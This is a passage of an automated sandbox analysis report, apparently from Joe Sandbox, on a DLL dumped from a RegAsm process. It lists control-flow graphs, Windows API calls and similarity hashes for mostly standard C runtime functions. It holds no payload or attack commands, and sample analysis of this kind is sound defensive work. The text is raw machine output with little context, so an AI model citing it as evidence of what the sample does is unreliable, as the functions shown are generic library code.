                                                                                                                                                                                control_flow_graph 147 10005ce1-10005cf5 148 10005d02-10005d1d LoadLibraryExW 147->148 149 10005cf7-10005d00 147->149 151 10005d46-10005d4c 148->151 152 10005d1f-10005d28 GetLastError 148->152 150 10005d59-10005d5b 149->150 155 10005d55 151->155 156 10005d4e-10005d4f FreeLibrary 151->156 153 10005d37 152->153 154 10005d2a-10005d35 LoadLibraryExW 152->154 157 10005d39-10005d3b 153->157 154->157 158 10005d57-10005d58 155->158 156->155 157->151 159 10005d3d-10005d44 157->159 158->150 159->158
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                                Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 160 1000c7a7-1000c7bc 161 1000c82d 160->161 162 1000c7be-1000c7c6 160->162 164 1000c82f-1000c833 161->164 162->161 163 1000c7c8-1000c7f6 call 1000c7e6 162->163 172 1000c7f8 163->172 173 1000c86c-1000c86e 163->173 165 1000c872 call 1000c877 164->165 166 1000c835-1000c83d GetModuleHandleA 164->166 168 1000c83f-1000c847 166->168 168->168 171 1000c849-1000c84c 168->171 171->164 176 1000c84e-1000c850 171->176 174 1000c7fa-1000c7fe 172->174 175 1000c85b-1000c85e 172->175 177 1000c870 173->177 178 1000c866-1000c86b 173->178 183 1000c800 174->183 184 1000c865 174->184 182 1000c85f-1000c860 call 1000c897 175->182 180 1000c852-1000c854 176->180 181 1000c856-1000c85a 176->181 177->171 178->173 180->182 181->175 182->184 186 1000c809-1000c80b 183->186 187 1000c804 call 1000c897 183->187 184->178 186->161 188 1000c80d-1000c81a VirtualProtect 186->188 187->186 189 1000c82c 188->189 190 1000c81c-1000c82a VirtualProtect 188->190 189->161 190->189
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2905821283-0
                                                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                                Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 191 1000c803-1000c80b call 1000c897 194 1000c82d 191->194 195 1000c80d-1000c81a VirtualProtect 191->195 198 1000c82f-1000c833 194->198 196 1000c82c 195->196 197 1000c81c-1000c82a VirtualProtect 195->197 196->194 197->196 199 1000c872 call 1000c877 198->199 200 1000c835-1000c83d GetModuleHandleA 198->200 201 1000c83f-1000c847 200->201 201->201 203 1000c849-1000c84c 201->203 203->198 204 1000c84e-1000c850 203->204 205 1000c852-1000c854 204->205 206 1000c856-1000c85e 204->206 207 1000c85f-1000c865 call 1000c897 205->207 206->207 211 1000c866-1000c86e 207->211 213 1000c870 211->213 213->203
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual$HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3519776433-0
                                                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                                Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 214 10006acb-10006aff GetCPInfo 215 10006bf5-10006c02 214->215 216 10006b05 214->216 217 10006c08-10006c18 215->217 218 10006b07-10006b11 216->218 219 10006c24-10006c2b 217->219 220 10006c1a-10006c22 217->220 218->218 221 10006b13-10006b26 218->221 223 10006c3b 219->223 224 10006c2d-10006c34 219->224 222 10006c37-10006c39 220->222 225 10006b47-10006b49 221->225 228 10006c3d-10006c4c 222->228 223->228 224->222 226 10006b28-10006b2f 225->226 227 10006b4b-10006b82 call 100086e4 call 10008a3e 225->227 231 10006b3e-10006b40 226->231 239 10006b87-10006bb2 call 10008a3e 227->239 228->217 230 10006c4e-10006c5e call 10002ada 228->230 234 10006b31-10006b33 231->234 235 10006b42-10006b45 231->235 234->235 238 10006b35-10006b3d 234->238 235->225 238->231 242 10006bb4-10006bbe 239->242 243 10006bc0-10006bcc 242->243 244 10006bce-10006bd0 242->244 245 10006bde-10006be5 243->245 246 10006bd2-10006bd7 244->246 247 10006be7 244->247 248 10006bee-10006bf1 245->248 246->245 247->248 248->242 249 10006bf3 248->249 249->230
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Info
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                                                                                • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                                                                • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                                                                                Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 250 10005f19-10005f3b call 10005c45 252 10005f40-10005f47 250->252 253 10005f70-10005f8a call 10005fa1 LCMapStringW 252->253 254 10005f49-10005f6e 252->254 258 10005f90-10005f9e call 10002ada 253->258 254->258
                                                                                                                                                                                APIs
                                                                                                                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: String
                                                                                                                                                                                • String ID: LCMapStringEx
                                                                                                                                                                                • API String ID: 2568140703-3893581201
                                                                                                                                                                                • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                                                                • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                                                                                Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 262 10005d5c-10005d7e call 10005c45 264 10005d83-10005d8a 262->264 265 10005d9b TlsAlloc 264->265 266 10005d8c-10005d99 264->266 267 10005da1-10005daf call 10002ada 265->267 266->267
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Alloc
                                                                                                                                                                                • String ID: FlsAlloc
                                                                                                                                                                                • API String ID: 2773662609-671089009
                                                                                                                                                                                • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                                                                                Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 272 10003af1-10003b06 call 10003a82 274 10003b0b-10003b12 272->274 275 10003b24-10003b26 TlsAlloc 274->275 276 10003b14-10003b23 274->276
                                                                                                                                                                                APIs
                                                                                                                                                                                • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: try_get_function
                                                                                                                                                                                • String ID: FlsAlloc
                                                                                                                                                                                • API String ID: 2742660187-671089009
                                                                                                                                                                                • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                                • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                                                                                • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                                • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                                                                                                                Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 279 10006e20-10006e44 call 100069f3 282 10006e54-10006e5b 279->282 283 10006e46-10006e4f call 10006a66 279->283 285 10006e5e-10006e64 282->285 290 10007001-10007010 call 10002ada 283->290 287 10006f54-10006f73 call 10002c40 285->287 288 10006e6a-10006e76 285->288 297 10006f76-10006f7b 287->297 288->285 291 10006e78-10006e7e 288->291 294 10006e84-10006e8a 291->294 295 10006f4c-10006f4f 291->295 294->295 299 10006e90-10006e9c IsValidCodePage 294->299 296 10007000 295->296 296->290 300 10006fb2-10006fbc 297->300 301 10006f7d-10006f82 297->301 299->295 302 10006ea2-10006eaf GetCPInfo 299->302 300->297 307 10006fbe-10006fe5 call 100069b5 300->307 303 10006f84-10006f8a 301->303 304 10006faf 301->304 305 10006eb5-10006ed6 call 10002c40 302->305 306 10006f39-10006f3f 302->306 308 10006fa3-10006fa5 303->308 304->300 317 10006ed8-10006edf 305->317 318 10006f29 305->318 306->295 310 10006f41-10006f47 call 10006a66 306->310 320 10006fe6-10006ff5 307->320 313 10006fa7-10006fad 308->313 314 10006f8c-10006f92 308->314 324 10006ffd-10006ffe 310->324 313->301 313->304 314->313 321 10006f94-10006f9f 314->321 322 10006ee1-10006ee6 317->322 323 10006f02-10006f05 317->323 326 10006f2c-10006f34 318->326 320->320 325 10006ff7-10006ff8 call 10006acb 320->325 321->308 322->323 327 10006ee8-10006eee 322->327 329 10006f0a-10006f11 323->329 324->296 325->324 326->325 330 10006ef6-10006ef8 327->330 329->329 331 10006f13-10006f27 call 100069b5 329->331 332 10006ef0-10006ef5 330->332 333 10006efa-10006f00 330->333 331->326 332->330 333->322 333->323
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 546120528-0
                                                                                                                                                                                • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                                • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                                                                • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                                • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                                                                                Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 336 10006c5f-10006c89 call 10005af6 call 10006d7e call 100069f3 343 10006c8b-10006c8d 336->343 344 10006c8f-10006ca4 call 100056d0 336->344 345 10006ce2-10006ce5 343->345 348 10006cd4 344->348 349 10006ca6-10006cbc call 10006e20 344->349 351 10006cd6-10006ce1 call 1000571e 348->351 352 10006cc1-10006cc7 349->352 351->345 354 10006ce6-10006cea 352->354 355 10006cc9-10006cce call 10006368 352->355 357 10006cf1-10006cfc 354->357 358 10006cec call 10007bbc 354->358 355->348 361 10006d13-10006d2d 357->361 362 10006cfe-10006d08 357->362 358->357 361->351 365 10006d2f-10006d36 361->365 362->361 364 10006d0a-10006d12 call 1000571e 362->364 364->361 365->351 367 10006d38-10006d4f call 100068c9 365->367 367->351 371 10006d51-10006d5b 367->371 371->351
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                                                  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                • _free.LIBCMT ref: 10006CD7
                                                                                                                                                                                • _free.LIBCMT ref: 10006D0D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorLast_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2991157371-0
                                                                                                                                                                                • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                                                                • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                                                                                Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 372 10001eec-10001ef5 373 10001ef7-10001efa 372->373 374 10001f2a-10001f35 dllmain_crt_process_detach 372->374 375 10001f1c-10001f28 dllmain_crt_process_attach 373->375 376 10001efc-10001eff 373->376 377 10001f3a 374->377 375->377 378 10001f01-10001f04 376->378 379 10001f12 call 100023ec 376->379 380 10001f3b-10001f3c 377->380 381 10001f06-10001f09 378->381 382 10001f0b-10001f10 call 1000240b 378->382 385 10001f17-10001f1a 379->385 381->380 382->385 385->380
                                                                                                                                                                                APIs
                                                                                                                                                                                • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                                • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3750050125-0
                                                                                                                                                                                • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                                                                • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                                                                Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 387 100038e8-100038ed call 10003af1 389 100038f2-100038fb 387->389 390 10003900-1000390f call 10003ba2 389->390 391 100038fd-100038ff 389->391 394 10003911-10003916 call 1000391b 390->394 395 10003918-1000391a 390->395 394->391
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 806969131-0
                                                                                                                                                                                • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                                                                • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                                                                Function 10005C45 Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __crt_fast_encode_pointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3768137683-0
                                                                                                                                                                                • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                                                                • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
